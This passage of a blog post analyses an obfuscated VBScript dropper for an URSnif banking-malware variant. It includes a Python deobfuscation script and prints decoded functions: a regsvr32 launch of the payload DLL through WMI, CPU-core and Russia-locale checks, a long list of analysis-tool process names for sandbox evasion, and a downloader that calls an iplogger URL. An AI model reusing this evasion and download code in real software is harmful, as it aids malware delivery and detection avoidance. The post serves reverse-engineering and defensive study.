iO,54,ZQ,Df,Yy,ay,mI85,rj,Fs450,HS,nF,tO350,Fs450,Kq,AK,Rh731,Bj418,302,302,FV,FL,gp,HX45,Cj,Jd,57,69,wW469,64,Fh,vM336,kh,aX,Gi,YH,Cz,Qh,TH,jw,AG,HS,vL,58,vK,ig,TH,VC,FL,Vb,Uv,gp,Hl,68,295,uk,Bi,Cz,301,Qy,kA,jz,FP305,Cj,eT,Rh,300,ax809,vM336,zo,Ua75,Mo,gA,jw,lS,68,Zs,bK,tB,it,kA,Rh,294,wR,64,nt,kA,Dr,vM336,Sh,Gs,iY,aX,zo,Bj418,Zs,zo,63,wg,Gs,vM336,mZ,61,Rh731,cp,av,jw,Ki,Ez,lu,lk,tB,mi436,Jf,302,ph,301,LS96,nt,sB,tX,nl,Pw,SK,vM336,Ig492,uk,Zt,Bi,bO,lu,58,Vb,Ry,xj,OG,wV,Zt,on539,aX,Lc,Qh,LS96,lk,qy350,YF,HT,Jf,TH,68,67,fc322,UN,Fx,cR,FV,ZQ,ww,it,VC,AK,fc322,ZQ,66,mZ,49,bi563,ET208,mZ,69,tB,Ta,Hl,OG599,Hp,rE995,xH,Pt,CF,tn,Rh,59,ly,RE,eb,nV130,Ry,gn,EI,gA,YA,BJ,Sf,Pr,lu,uk,ax809,51,UN,mi,HT,fp537,mi,zo,Vw,qy350,JB,mF,lX,293,ix136,ax809,Dt,nF,lX,64,Ig492,66,gd,aX,fr,Jd,VM,nV130,wg,49,NX,Jd,JB,jz,58,UH,rj,yX,mz703,EI,JB,iO,kN,FL,EI,nc,Gi,293,PX,nB,UN,wc,Vy62,vK,dz,Ki,Df,Yr,ps,eC,zo,mz703,af,tB,Dr]
<SNIP SNIP>

Remember = []
SaveToFile = open('conspiratorial.zip', 'wb')
for line in arr1:
if line and type(line) is list:
for secline in line:
secline = (int(secline) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
Remember.append(int(secline))

RememberTwo = []
for line in Remember:
RememberTwo.append((chr(int(line))))

for line in RememberTwo:
SaveToFile.write(line)

SaveToFile.close()

The python script is too long as it contains many arrays taken from the VBScript. Therefore, please refer to the following Github link where I uploaded the script I have created to convert these arrays and dump them to the file conspiratorial.zip: 

https://github.com/taogoldi/Decoders/blob/master/ursnif_afterbirth/convertToVBScript.py

Code Review of the decoded VBScript

The previous section covered the obfuscation techniques used in the VBScript and the section also provided the process on how to deobfuscated each one.  This section will cover the functionality of some of the deobfuscated functions.

The first section is where the file  afterbirth.rs is registered  with the OS using the Windows native regsvr32.exe command. The function uses the WMI winmgmts:Win32_Process command to start a new regsv32 process with the flag -s and the file afterbirth.rs. This is the DLL file associated with the URSnif variant:

Function VzH()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
Exit Function
End If
principal("https://iplogger.org/1bP467")
Set eyelidService = GetObject("winmgmts:Win32_Process")
eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""
pestle
End Function

This is where the URSnif variant is attempted to run on the affected system.

The following function is responsible for declaring the variable JPi and getting the local user temporary folder:

Function JPi()
JPi = CStr(WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder((((4344 - 4332.0) + (-(5 - 1.0))) - 6.0)) + "\")
End Function

The mathematical calculation ((4344 – 4332.0) + (-(5 – 1.0))) – 6.0)) equals to 2.0 which indicates that JPi is equal to the TemporaryFolder.

The following section is the section responsible to check the number of CPU cores on the system. If the number of cores in the CPU is left than 3, the VBScript will quit and won’t execute any further:

Function PfLXN()
on error resume next
If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
Exit Function
End If
Set eyelidService = GetObject("winmgmts:\\.\root\cimv2")
REM cohomology oratorio status policemen floppy hey tame chiefdom inch376 Prescott hogging variety boss 
Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_Processor", , (37 + (2540 - (3148 - (48 + 571.0)))))
For Each liy In whetherlItems
REM radial pigeonhole adore phenol Beaumont he Hager showman grantor adequate controlling mosquitoes icky902 nebulous Goodwin offshoot Bayreuth duodenum flyer guignol Precambrian bestowal rouse hamstrung intra Voss clove combustible correspond leftward, constant Voss247 
If liy.NumberOfCores < (((88 + 4859.0) - (23 + 1147.0)) - 3774.0) Then
REM oral climate garnish euthanasia transparent typhus sugary corpsman waitress squatted Haddad Felice oldy. 
mA810 = True
End If
' dart quagmire Cambridge. yak Punic Columbia Gestapo930 
Next
If mA810 Then
Qn
End If
REM demerit Baldwin amoral skid, ideate amp Rankin myrtle Angola626 experimentation. hoc materiel synthesis mawkish, thrift loaves ongoing jawbone Gotham gratuity marina abide, 4129155 electrify gases postmen motive postman claustrophobia bonnet sloganeer sled Walpole immodesty Salina 
End Function

To accomplish this number of cores check, the function uses the WMI Win32_Processor command. My assumption here is that the attacker didn’t want to allow the VBScript to run successfully if the OS has less than 3 cores as this could be as sign that the script is running on a VM environment. You can read more about the win32-processor function from Microsoft.

The next function is also pretty interesting function. This function is used to test for specific running processes as you can see in the following code:

Function whered()
on error resume next
If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
Exit Function
End If
whetherproc = ((103 - (27 - 7.0)) + (-(79 + 4.0)))
xk = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")
Set eyelidService = GetObject("winmgmts:\\.\root\cimv2")
REM bee afloat hall linoleic simplistic dielectric Moorish metallurgist Terre206 devil
Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_Process")
For Each liy In whetherlItems
REM inscrutable. 6170257 Grossman desperado, delectate complete TRW malcontent bimetallism head wag Ponce fled blackball penumbral sedition find teleprompter lion operate mozzarella buttonweed whorl computation kerry bloodroot because banquet Martinson, vodka depreciate Johann
whetherproc = whetherproc + 1
For Each Luzon In xk
' hex. polonaise deviate Mesozoic, 7599098 regular ashy spa Stevenson tact emeriti doe debater frugal wake504 bleed Carlisle locomotor Chimique
If liy.Name = Luzon Then
Qn
End If
' Sammy plump revel, battery twosome troublesome cantle cadmium agreeing hilum revelatory marketwise jounce proverbial Giacomo please Alcott Smyrna spar
Next
Next
If (whetherproc < 28) Then
' cymbal. 3319894 hospitable. speech. McMullen superstitious hydrophilic faithful cookery Uruguay cardigan bridle siliceous Brandeis mainline chatty figurine slugging oases173 fisticuff rosebush. Mekong Kruger gunfire moat tyrannic
REM necktie attract petri weary charity sedate consequent silken378 psychoanalytic chairman femoral vote drab footwear offal hangmen lacewing, miscellany anecdotal Dooley titular, gelatinous. 645511 bandstand phosphate. 7899555 noodle divisible plan paraphrase corundum dal Hewitt Barnum halite Errol, Roberto
Qn
End If
' wonderful bloody cryptanalysis Goliath280 minstrel Geiger USIA. 565864 puma Kowalski Olson. 6172545 ethnomusicology alabaster quotation pram adorn Jimenez
End Function

Essentially, there is an array called xk that contains a list of process names (i.e. dumpcap.exe, analyzer.exe, pythonw.exe, wireshark.exe and the list goes on and on). This function then call the WMI command Win32_Process and check if each process (by process name) in the array is running as a process on the system. If the answer is true, then the VBScript quits and doesn’t execute any further. Also here the attacker attempts to find out if the VBScript is being analyzed in a VM by checking for known tools used in a file analysis process.

The next function is also pretty inserting. This function is responsible to check the GEO location of the OS by checking the value from the registry key HKEY_CURRENT_USER\Control Panel\International\Geo\Nation:

Function isopleth()
on error resume next
REM staff defeat viva egg indiscoverable wiggle
If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
REM robbery inequality transvestite Lowe bedpost. exact pilgrim invest apostle gestural hundredth Blanchard sequestration electrify2 lighten amen combinate
Exit Function
' director anniversary stagnant canticle elate incestuous liquefaction flock ax Fe grasp tic askew
End If
PfQp = 15
if (PfQp > (((55 - 3.0) + (-(2401 - 2359.0))) + (0.0))) Then
REM rep reactant atmosphere wish TV phobic themselves conferee lugging nightmare bullfinch stabile funny, downspout octahedra keyboard skirt obviate
vr396 = Array(203)
Dim oEJa:Set oEJa = CreateObject("WScript.Shell")
social = oEJa.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")
For Each ltmXN In vr396
If (ltmXN = Cint(social)) Then
principal("")
pestle
REM soul378 conifer Alvarez slide, waist Upton PVC945 consign agglutinin useful incantation conflict grim nautical Olympia covary construe Baptiste manuscript venial jaundice. 6544385
permalloy
' Greene lusty Abo conquest200 birdseed defector. crockery agrimony wrongful Simla Meiji cafeteria resignation delivery larkspur actinic contrapositive dirt
WScript.Quit
End If
Next
End if
REM Columbia603 quartet exact507 seance burdensome brushfire swabby ploy shyly measure454 consignee nucleus Phobos Addis geodesic Dr bath wallow quicken Hugo completion doctrinaire Maximilian Elaine embargoes thatd, curia
End Function

If the GEO value is equal to 203 (GEO location associated with Russia) then the VBScript quits as well and no further operation occurs. Please refer to the table of GEO locations to see all possible GOE locations in this registry key. My assumption here that the attacker doesn’t want that script to execute in a computer associated with Russia GEO location. This could indicate that the attacker is located in Russia and not interested to compromise users if their system is located in Russia.

The following function is interesting as well. This function responsible for downloading files from the Internet:

Function principal(aC630)
on error resume next
REM decile, bicep barricade catwalk gene biplane split terminate booth assassin Platonism millionth diehard Schuster100 Pollard MacDougall764 howsomever, thunder Rinehart, Waco quad puerile megabit pervasion Krueger.
Dim ViYZU: Set ViYZU = CreateObject("MSXML2.ServerXMLHTTP.6.0")
ViYZU.setOption(2) = (((115 - 62.0) + (13313 - 127.0)) - 183.0)
ViYZU.Open "GET", aC630, False
ViYZU.setRequestHeader "User-Agent", "Mozilla/4.0"
ViYZU.Send
' dream wealthy mink eigenvalue fib zealot redcoat otter effeminate Kelvin invention straight, 626586 frowzy deciduous448 refectory backtrack cant edelweiss, skin Chloe dangerous recuperate
End Function

There are several lines in this VBScript where is this function is called to download the following URL:

principal("https://iplogger[.]org/1bP467")

My assumption here is that the attacker used this URL shorten service to download additional files to the affected system. However, the link is no longer valid.

Other than that there are some other functions in the VBScript file but they are less interesting. In addition, I didn’t include any information about the URSnif variant because there are plenty blog posts out there that dissect this variant quite beautifully. 

Leave a Reply

Your email address will not be published. Required fields are marked *